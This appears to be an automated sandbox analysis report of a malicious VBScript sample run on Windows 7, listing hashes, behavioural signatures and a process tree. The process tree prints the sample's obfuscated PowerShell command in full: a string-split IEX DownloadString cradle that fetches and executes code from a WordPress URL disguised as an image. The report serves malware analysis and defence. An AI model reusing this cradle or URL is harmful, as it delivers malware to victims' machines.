Analysis
-
max time kernel
118s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
20-10-2024 01:57
Static task
static1
Behavioral task
behavioral1
Sample
2a08ea90518aa5b6f42d1ffa9632584fabe46dacc993732ac9776a71b9ac8acd.vbs
Resource
win7-20241010-en
windows7-x64
5 signatures
150 seconds
General
-
Target
2a08ea90518aa5b6f42d1ffa9632584fabe46dacc993732ac9776a71b9ac8acd.vbs
-
Size
12KB
-
MD5
75f80ac848e2c5c71c5fc4960da7a430
-
SHA1
abcd9316f8a1251220db81d4d075ae659a0fb790
-
SHA256
2a08ea90518aa5b6f42d1ffa9632584fabe46dacc993732ac9776a71b9ac8acd
-
SHA512
af4db86a398ac31f3b7d909ed62c8ea6b3672db933deadf32ae74e3dac581816372bfb0fc113f5b1aab462291d560516cadd52c655eebd79b7f639467c2c0ce1
-
SSDEEP
48:UvvvvvvvvvvviddddddddddFP5+31HtwLhLtz/zzUSAzzzzzzzzzzzzzzzzzzzze:UvvvvvvvvvvviddddddddddZagKoJ
Score
8/10
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 3 2260 powershell.exe 4 2260 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2260 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2260 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
WScript.exedescription pid process target process PID 2884 wrote to memory of 2260 2884 WScript.exe powershell.exe PID 2884 wrote to memory of 2260 2884 WScript.exe powershell.exe PID 2884 wrote to memory of 2260 2884 WScript.exe powershell.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2a08ea90518aa5b6f42d1ffa9632584fabe46dacc993732ac9776a71b9ac8acd.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2884 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command $t1='IEX(New-Object Net.W';$t2='ebClient).Downlo';$t3='t4(''https://totalhorsehealth.com/wp-admin/images/images/img.jpg'')'.Replace('t4','adString');IEX($t1+$t2+$t3)2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2260